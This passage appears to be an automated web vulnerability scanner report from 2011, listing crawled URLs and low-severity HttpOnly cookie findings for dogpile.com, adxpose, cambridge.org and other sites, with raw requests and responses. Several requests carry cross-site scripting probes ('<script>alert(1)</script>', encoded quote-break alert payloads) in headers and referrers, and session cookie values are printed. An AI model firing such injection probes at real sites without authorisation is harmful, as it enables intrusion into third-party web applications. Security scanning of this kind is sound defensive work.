http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://safebrowsing.clients.google.com/safebrowsing/downloads
http://syndication.mmismm.com/tntwo.php
http://tags.bluekai.com/site/2045
http://tags.bluekai.com/site/2731
http://view.c3metrics.com/c3VTabstrct-6-2.php
http://www.allgetaways.com/favicon.ico
http://www.amway.com/favicon.ico
http://www.androidtapp.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php
http://www.androidtapp.com/wp-login.php
http://www.battleofthecheetos.com/favicon.ico
http://www.belkin.com/favicon.ico
http://www.betus.com/favicon.ico
http://www.billoreilly.com/favicon.ico
http://www.blacksingles.com/favicon.ico
http://www.bluefly.com/favicon.ico
http://www.boardgamegeek.com/favicon.ico
http://www.bradsdeals.com/favicon.ico
http://www.cancercenter.com/favicon.ico
http://www.capella.edu/favicon.ico
http://www.caring4cancer.com/favicon.ico
http://www.chasefreedomnow.com/favicon.ico
http://www.cheapostay.com/favicon.ico
http://www.clearcontests.com/favicon.ico
http://www.csi-tracking.com/favicon.ico
http://www.dailydealfetcher.com/
http://www.deviceanywhere.com/favicon.ico
http://www.dmvnow.com/exec/common/VitaHeader-Redesign.css
http://www.dmvnow.com/exec/common/dmvnow2.css
http://www.dmvnow.com/exec/common/dmvprint.css
http://www.dmvnow.com/exec/common/textsizer.js
http://www.dmvnow.com/favicon.ico
http://www.dmvnow.com/images/aboutus_off.gif
http://www.dmvnow.com/images/aboutus_on.gif
http://www.dmvnow.com/images/ads/11042.jpg
http://www.dmvnow.com/images/ads/11092.jpg
http://www.dmvnow.com/images/ads/11134.jpg
http://www.dmvnow.com/images/ads/11153.jpg
http://www.dmvnow.com/images/ads/11190.jpg
http://www.dmvnow.com/images/ads/11216.jpg
http://www.dmvnow.com/images/breadcrumbcenter.jpg
http://www.dmvnow.com/images/citserv_on.gif
http://www.dmvnow.com/images/common_feel_bg.jpg
http://www.dmvnow.com/images/commserv_on.gif
http://www.dmvnow.com/images/contactus_off.gif
http://www.dmvnow.com/images/contactus_on.gif
http://www.dmvnow.com/images/dmv2.jpg
http://www.dmvnow.com/images/dmv3.jpg
http://www.dmvnow.com/images/dmv4.jpg
http://www.dmvnow.com/images/dmv7b.jpg
http://www.dmvnow.com/images/dmv8b.jpg
http://www.dmvnow.com/images/dmvcontent11.jpg
http://www.dmvnow.com/images/dmvgeneral1.jpg
http://www.dmvnow.com/images/dmvhome9.jpg
http://www.dmvnow.com/images/dmvhome_on.gif
http://www.dmvnow.com/images/dmvnow.jpg
http://www.dmvnow.com/images/forms_on.gif
http://www.dmvnow.com/images/geninfo_on.gif
http://www.dmvnow.com/images/go_ball.gif
http://www.dmvnow.com/images/icon_email.gif
http://www.dmvnow.com/images/icon_printergif.gif
http://www.dmvnow.com/images/moving_on.gif
http://www.dmvnow.com/images/officelocations_off.gif
http://www.dmvnow.com/images/officelocations_on.gif
http://www.dmvnow.com/images/online_on.gif
http://www.dmvnow.com/images/peak2000.jpg
http://www.dmvnow.com/images/resources_on.gif
http://www.dmvnow.com/images/se.gif
http://www.dmvnow.com/images/sitemap_off.gif
http://www.dmvnow.com/images/sitemap_on.gif
http://www.dmvnow.com/images/sw.gif
http://www.dmvnow.com/images/tanline.jpg
http://www.dmvnow.com/images/virginia_dot_gov_logo.jpg
http://www.dmvnow.com/images/virginia_seach_button-bg.jpg
http://www.dmvnow.com/images/virginia_seach_txt-bg.jpg
http://www.dmvnow.com/images/wcag1A.gif
http://www.dmvnow.com/images/webfeed.png
http://www.dogtimemedia.com/favicon.ico
http://www.driversed.com/favicon.ico
http://www.focusonthefamily.com/favicon.ico
http://www.guthy-renker-store.com/favicon.ico
http://www.heavygames.com/favicon.ico
http://www.jobtarget.com/favicon.ico
http://www.jpcycles.com/favicon.ico
http://www.kraftbrands.com/favicon.ico
http://www.lookupanyone.com/favicon.ico
http://www.membershiprewards.com/favicon.ico
http://www.mychasecreditcards.com/favicon.ico
http://www.nielsen.com/favicon.ico
http://www.nwf.org/favicon.ico
http://www.owners.com/favicon.ico
http://www.peopletopeople.com/favicon.ico
http://www.personalizationmall.com/favicon.ico
http://www.progressiveagent.com/favicon.ico
http://www.rambler.ru/favicon.ico
http://www.rcuniverse.com/favicon.ico
http://www.richard-group.com/favicon.ico
http://www.savingssavy.info/favicon.ico
http://www.sba.gov/favicon.ico
http://www.superherohype.com/favicon.ico
http://www.thebreastcancersite.com/favicon.ico
http://www.venus.com/favicon.ico
http://www.volunteermatch.org/favicon.ico
http://www.wpbf.com/favicon.ico
http://www.wyndham.com/favicon.ico
http://www.zoomshare.com/favicon.ico

7.1. http://ads.adxpose.com/ads/ads.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=CBDAE256B2080D0F012F79A5FACEEE4E; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289669 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CBDAE256B2080D0F012F79A5FACEEE4E; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:11:06 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

7.2. http://community.dogpile.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://community.dogpile.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RescueSession=ActionId=43DDD57FCB095AE12037A4C99B8AF55D&SessionId=B63CD17302B6DFC9486F33ED8B8928F7; expires=Fri, 01-Apr-2011 17:32:11 GMT; path=/; domain=rescue.dogpile.com
RescueUserProfile=AnonymousId=54FD7D1F4FCE244B9E8E2E6C78C4AD06; expires=Mon, 29-Mar-2021 17:12:11 GMT; path=/; domain=rescue.dogpile.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: community.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:01 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 17:12:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.8
Set-Cookie: RescueUserProfile=AnonymousId=54FD7D1F4FCE244B9E8E2E6C78C4AD06; expires=Mon, 29-Mar-2021 17:12:11 GMT; path=/; domain=rescue.dogpile.com
Set-Cookie: RescueSession=ActionId=43DDD57FCB095AE12037A4C99B8AF55D&SessionId=B63CD17302B6DFC9486F33ED8B8928F7; expires=Fri, 01-Apr-2011 17:32:11 GMT; path=/; domain=rescue.dogpile.com
Last-Modified: Fri, 1 Apr 2011 17:12:11 GMT
Expires: Fri, 1 Apr 2011 17:12:11 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Dogpi
...[SNIP]...

7.3. http://dogpile.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dogpile.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=81494ffc47974db2916bc16a3af0cb01&ActionId=f36f67d75e224d789aeec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:20 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:20 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:20 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

7.4. http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dogpile.com
Path:	/dogpile/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=bc343352182e410c9000c16a3af0cb01&ActionId=3155485be7cc4f26b720c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:57 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:57 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/index/qcat=yp/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: dogpile.com
Proxy-Connection: keep-alive
Referer: http://dogpile.com/dogpile/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:54 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=27d7a85c00b947f2b3cfc16a3af0cb01&ActionId=9ca43f5d994646fab1d4c16a3af0cb01&CookieDomain=.dogpile.com

Response

7.5. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dogpile.com
Path:	/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0ff17b4a4f38410788e3c16a3af0cb01&ActionId=77b317ce98ea4bf38978c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:30 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:30 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:30 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.6. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0BE869A660A3DE89D6731FBA06CC4026; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-8825891582215045%26output%3Dhtml%26h%3D250%26slotname%3D9743825372%26w%3D300%26lmt%3D1301699500%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.quickyellow.com%252F%26dt%3D1301681500418%26bpp%3D2%26shv%3Dr20110324%26jsv%3Dr20110321-2%26prev_slotnames%3D8282812667%26correlator%3D1301681500450%26frm%3D0%26adk%3D3051422498%26ga_vid%3D1234146098.1301681501%26ga_sid%3D1301681501%26ga_hid%3D936317177%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1118%26bih%3D1004%26fu%3D0%26ifi%3D2%26dtd%3D145%26xpc%3DHEyqJzw6JK%26p%3Dhttp%253A%2F%2Fwww.quickyellow.com&uid=ZC45X9Axu6NOUFfX_289669&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=166308&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0BE869A660A3DE89D6731FBA06CC4026; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Fri, 01 Apr 2011 18:11:05 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289669");

7.7. http://support.dogpile.com/pressroom/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://support.dogpile.com
Path:	/pressroom/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RescueSession=ActionId=3006D351E8C7410683E8A3FC6EAE0BDD&SessionId=E801149D4CBCD3E8143E4A98AE2C088E; expires=Fri, 01-Apr-2011 17:32:09 GMT; path=/; domain=rescue.dogpile.com
RescueUserProfile=AnonymousId=042912B6EF477475A9F8C372FEAD0737; expires=Mon, 29-Mar-2021 17:12:09 GMT; path=/; domain=rescue.dogpile.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pressroom/ HTTP/1.1
Host: support.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:01 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 17:12:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.8
Set-Cookie: RescueUserProfile=AnonymousId=042912B6EF477475A9F8C372FEAD0737; expires=Mon, 29-Mar-2021 17:12:09 GMT; path=/; domain=rescue.dogpile.com
Set-Cookie: RescueSession=ActionId=3006D351E8C7410683E8A3FC6EAE0BDD&SessionId=E801149D4CBCD3E8143E4A98AE2C088E; expires=Fri, 01-Apr-2011 17:32:09 GMT; path=/; domain=rescue.dogpile.com
Last-Modified: Fri, 1 Apr 2011 17:12:09 GMT
Expires: Fri, 1 Apr 2011 17:12:09 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Do
...[SNIP]...

7.8. http://www.888.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.888.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=42exmk55tdj1cneietsdoz45; domain=.888.com; path=/
MainCookie=OSR=486413&RefType=NoReferrer&Srv=NO-01&Lang=en; domain=888.com; expires=Sun, 01-Apr-2012 16:09:33 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.9. http://www.adleaf.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.adleaf.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=71F7C0E735104D106C5AE3B48EB85F50; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adleaf.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=71F7C0E735104D106C5AE3B48EB85F50; Path=/
Accept-Ranges: bytes
ETag: W/"630-1294710320000"
Last-Modified: Tue, 11 Jan 2011 01:45:20 GMT
Content-Length: 630
Date: Fri, 01 Apr 2011 16:48:46 GMT

BMv.......v...(... ... .................................................................................................................................................................................
...[SNIP]...

7.10. http://www.cambridge.org/uk/date/writeYear_js.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cambridge.org
Path:	/uk/date/writeYear_js.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /uk/date/writeYear_js.asp HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/favicon.ico41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.3.10.1301681613

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 40
Content-Type: text/html
Cache-Control: private
Date: Fri, 01 Apr 2011 18:14:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; path=/

7.11. http://www.dogpile.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=2de9fa38eedf4cf59191c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:48 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:48 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.12. http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/clickcallbackserver/_iceUrlFlag=1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:01 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:01 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:01 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.13. http://www.dogpile.com/clickserver/_iceUrlFlag=1 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/clickserver/_iceUrlFlag=1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:13 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:13 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:13 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.14. http://www.dogpile.com/dogpile/ws/about/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/about/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=136fb87258794bf0868fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:26 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:26 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:26 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/about/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

